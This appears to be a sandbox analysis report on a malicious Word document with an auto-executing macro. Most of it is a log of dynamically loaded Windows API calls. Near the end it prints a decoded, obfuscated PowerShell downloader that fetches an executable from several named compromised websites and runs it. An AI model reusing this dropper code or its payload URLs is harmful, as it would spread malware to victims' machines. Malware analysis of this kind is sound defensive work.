DynamicLoader: WINSPOOL.DRV/AddPrinterDriverExA
DynamicLoader: WINSPOOL.DRV/EnumPrinterDriversW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverExW
DynamicLoader: WINSPOOL.DRV/AddPrintProcessorW
DynamicLoader: WINSPOOL.DRV/EnumPrintProcessorsW
DynamicLoader: WINSPOOL.DRV/GetPrintProcessorDirectoryW
DynamicLoader: WINSPOOL.DRV/EnumPrintProcessorDatatypesW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/SplDriverUnloadComplete
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/OpenPrinterW
DynamicLoader: WINSPOOL.DRV/OpenPrinterA
DynamicLoader: WINSPOOL.DRV/ResetPrinterW
DynamicLoader: WINSPOOL.DRV/StartDocPrinterW
DynamicLoader: WINSPOOL.DRV/FlushPrinter
DynamicLoader: WINSPOOL.DRV/GetPrinterDataW
DynamicLoader: WINSPOOL.DRV/SetPrinterDataW
DynamicLoader: WINSPOOL.DRV/AddJobW
DynamicLoader: WINSPOOL.DRV/ScheduleJob
DynamicLoader: WINSPOOL.DRV/WaitForPrinterChange
DynamicLoader: WINSPOOL.DRV/FindNextPrinterChangeNotification
DynamicLoader: WINSPOOL.DRV/PrinterMessageBoxW
DynamicLoader: WINSPOOL.DRV/ClosePrinter
DynamicLoader: WINSPOOL.DRV/AddFormW
DynamicLoader: WINSPOOL.DRV/DeleteFormW
DynamicLoader: WINSPOOL.DRV/GetFormW
DynamicLoader: WINSPOOL.DRV/SetFormW
DynamicLoader: WINSPOOL.DRV/EnumFormsW
DynamicLoader: WINSPOOL.DRV/EnumPortsW
DynamicLoader: WINSPOOL.DRV/EnumMonitorsW
DynamicLoader: WINSPOOL.DRV/AddPortW
DynamicLoader: WINSPOOL.DRV/ConfigurePortW
DynamicLoader: WINSPOOL.DRV/DeletePortW
DynamicLoader: WINSPOOL.DRV/GetPrinterW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverPackageW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: GDI32.dll/GdiPrinterThunk
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: secur32.dll/InitSecurityInterfaceW
DynamicLoader: cryptsp.dll/SystemFunction035
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: unidrvui.dll/DrvResetConfigCache
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/StartDocDlgW
DynamicLoader: WINSPOOL.DRV/OpenPrinterW
DynamicLoader: WINSPOOL.DRV/ResetPrinterW
DynamicLoader: WINSPOOL.DRV/ClosePrinter
DynamicLoader: WINSPOOL.DRV/GetPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverW
DynamicLoader: WINSPOOL.DRV/EndDocPrinter
DynamicLoader: WINSPOOL.DRV/EndPagePrinter
DynamicLoader: WINSPOOL.DRV/ReadPrinter
DynamicLoader: WINSPOOL.DRV/StartDocPrinterW
DynamicLoader: WINSPOOL.DRV/StartPagePrinter
DynamicLoader: WINSPOOL.DRV/AbortPrinter
DynamicLoader: WINSPOOL.DRV/DocumentEvent
DynamicLoader: WINSPOOL.DRV/QuerySpoolMode
DynamicLoader: WINSPOOL.DRV/QueryRemoteFonts
DynamicLoader: WINSPOOL.DRV/SeekPrinter
DynamicLoader: WINSPOOL.DRV/QueryColorProfile
DynamicLoader: WINSPOOL.DRV/SplDriverUnloadComplete
DynamicLoader: WINSPOOL.DRV/DocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeW
DynamicLoader: WINSPOOL.DRV/GetSpoolFileHandle
DynamicLoader: WINSPOOL.DRV/CommitSpoolData
DynamicLoader: WINSPOOL.DRV/CloseSpoolFileHandle
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: mxdwdrv.dll/DrvEnableDriver
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: prntvpt.dll/PTOpenProvider
DynamicLoader: prntvpt.dll/PTCloseProvider
DynamicLoader: prntvpt.dll/PTConvertDevModeToPrintTicket
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/DPA_Create
DynamicLoader: comctl32.dll/DPA_InsertPtr
DynamicLoader: comctl32.dll/DPA_DeletePtr
DynamicLoader: comctl32.dll/DPA_Search
DynamicLoader: kernel32.dll/RegCreateKeyExW
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: wbemsvc.dll/DllGetClassObject
DynamicLoader: wbemsvc.dll/DllCanUnloadNow
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LCIDToLocaleName
DynamicLoader: kernel32.dll/GetSystemDefaultLocaleName
DynamicLoader: ADVAPI32.dll/LsaEnumerateTrustedDomains
DynamicLoader: ADVAPI32.dll/LsaQueryInformationPolicy
DynamicLoader: ADVAPI32.dll/LsaNtStatusToWinError
DynamicLoader: ADVAPI32.dll/LsaFreeMemory
DynamicLoader: ADVAPI32.dll/LsaOpenPolicy
DynamicLoader: ADVAPI32.dll/LsaClose
DynamicLoader: ADVAPI32.dll/QueryServiceStatusEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorControl
DynamicLoader: ADVAPI32.dll/ConvertToAutoInheritPrivateObjectSecurity
DynamicLoader: ADVAPI32.dll/DestroyPrivateObjectSecurity
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/AddAccessAllowedObjectAce
DynamicLoader: ADVAPI32.dll/AddAccessDeniedObjectAce
DynamicLoader: ADVAPI32.dll/AddAuditAccessObjectAce
DynamicLoader: ADVAPI32.dll/SetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/SetNamedSecurityInfoExW
DynamicLoader: ADVAPI32.dll/GetExplicitEntriesFromAclW
DynamicLoader: ADVAPI32.dll/GetEffectiveRightsFromAclW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: userenv.dll/DestroyEnvironmentBlock
DynamicLoader: userenv.dll/CreateEnvironmentBlock
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: SspiCli.dll/GetUserNameExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/StringFromCLSID
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
Executed a very long command line or script command which may be indicative of chained commands or obfuscation
command: powershell -enco [Base64-encoded command]
The office file contains 2 macros
The office file contains a macro with auto execution
autoopen: Runs when the Word document is opened
The office file contains anomalous features
creation_anomaly: The file appears to have an edit time yet has no creation time or last saved time. This can be a sign of an automated document creation kit.
A scripting utility was executed
command: powershell -enco [Base64-encoded command]
Creates a hidden or system file
file: C:\Users\user\AppData\Local\Temp\~$pjlr0l6ur.doc
Windows Management Instrumentation (WMI) attempted to create a process
cmdline: powershell -enco [Base64-encoded command]
Windows Management Instrumentation (WMI) attempted to execute a command or scripting utility
cmdline: powershell -enco [Base64-encoded command]
A script or command line contains a long continuous string indicative of obfuscation
command: powershell -enco [Base64-encoded command]
The office file contains a macro with suspicious strings
ChrW: May attempt to obfuscate specific strings (use option --deobf to deobfuscate)
virtual: May detect virtualization
CreateObject: May create an OLE object
system: May run an executable file or a system command on a Mac (if combined with libc.dylib)
ShowWindow: May hide the application
Open: May open a file
Attempts to execute suspicious powershell command arguments
command: powershell -enco [Base64-encoded command]
decoded_base64_string: <# https://www.microsoft.com/ #> $x1b3x1796c3='xc27521507500';$x808x090xc0cc = '852';$c5c8708b8768='b800600c904';$b8b868320x0cx=$env:userprofile+'\'+$x808x090xc0cc+'.exe';$b85146c09121='x009666b0002';$x180x059c3cc7=.('new'+'-obje'+'ct') NeT.WebClIeNT;$xx305717093='https://www.skullbali.com/bk.wp-content/311/@http://cheematransxpressinc.com/wp-includes/shm5djl4638/@https://aceontheroof.com/i0oni/gzx5550/@http://www.dgxbydamonique.com/fr4jt/cache/init.upper/h8914/@https://aaplindia.com/harder.inc/odw8xth96/'."s`plIT"('@');$b91203x413bc0='b88x4820c0106';foreach($c183b58bx5c72 in $xx305717093){try{$x180x059c3cc7."d`OWNLOa`dF`Ile"($c183b58bx5c72, $b8b868320x0cx);$xb35100x3c50='b390222210x2';If ((&('Ge'+'t-I'+'tem') $b8b868320x0cx)."l`enGTH" -ge 38527) {[Diagnostics.Process]::"sTA`RT"($b8b868320x0cx);$b4560bx02205='c00726550171';break;$b50x079902047='c50703019860'}}catch{}}$x06bc30306b7='b8000x1007b68'

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States

DNS

Name Response Post-Analysis Lookup
www.skullbali.com [VT]
